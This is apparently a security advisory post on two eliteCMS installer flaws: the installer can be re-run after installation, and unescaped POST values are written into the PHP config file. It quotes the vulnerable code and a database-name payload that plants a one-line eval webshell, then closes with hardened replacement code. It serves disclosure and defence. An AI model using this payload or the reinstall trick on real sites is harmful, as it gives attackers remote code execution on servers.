eliteCMS: installer not verified after install + one-line webshell write vulnerability

Posted by the original poster on 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can revisit the installer URL and run the installation again.

The other vulnerability is that the installer can write a one-line webshell straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated into PHP source with no escaping or validation
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to the config file as-is
    $writer = fopen($file, 'w');
...
Now look at the code that fills the session:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor gets written into /admin/includes/config.php.
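As an added example (not eliteCMS code), here is how the step-4 config writer could be hardened against both issues described above: an install lock that refuses to run twice, an allow-list on each POSTed value, and var_export() instead of raw interpolation so a value can never break out of the string literal. The function name, lock file and config path are hypothetical.

```php
<?php
// Added example, not eliteCMS code. writeDbConfig(), $configFile and $lockFile are hypothetical names.
function writeDbConfig(array $post, string $configFile, string $lockFile): void
{
    // 1. Refuse to run again once installation has completed (the lock file is
    //    created at the end of a successful run).
    if (file_exists($lockFile)) {
        throw new RuntimeException("Installer is locked; remove $lockFile to reinstall.");
    }

    // 2. Validate every value against a strict allow-list before it gets near PHP source.
    //    The database name rule alone rejects "?><?php ... because of the quote and brackets.
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]+(:\d{1,5})?$/',  // host[:port]
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',          // MySQL identifier characters only
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
        'DB_PASS'   => '/^[\x20-\x7E]{0,128}$/',          // printable ASCII; quotes handled in step 3
    ];
    $clean = [];
    foreach ($rules as $key => $pattern) {
        $value = $post[$key] ?? '';
        if (!is_string($value) || !preg_match($pattern, $value)) {
            throw new InvalidArgumentException("Invalid value for $key");
        }
        $clean[$key] = $value;
    }

    // 3. Never interpolate raw input into code: var_export() emits a quoted PHP literal
    //    with ' and \ escaped, so even a password containing quotes stays a string.
    $src = "<?php\n";
    foreach ($clean as $key => $value) {
        $src .= sprintf("define('%s', %s);\n", $key, var_export($value, true));
    }

    // 4. Write to a temp file, then rename into place so a half-written config is never live.
    $tmp = $configFile . '.tmp';
    if (file_put_contents($tmp, $src, LOCK_EX) === false || !rename($tmp, $configFile)) {
        throw new RuntimeException("Could not write $configFile");
    }
    chmod($configFile, 0640);

    // 5. Lock the installer so the step cannot be replayed after a successful install.
    file_put_contents($lockFile, date('c') . "\n");
}
```

The allow-list stops the POSTed database name from carrying PHP source at all, and var_export() is the second layer in case a rule is later loosened; the lock file closes the re-installation issue from the first paragraph.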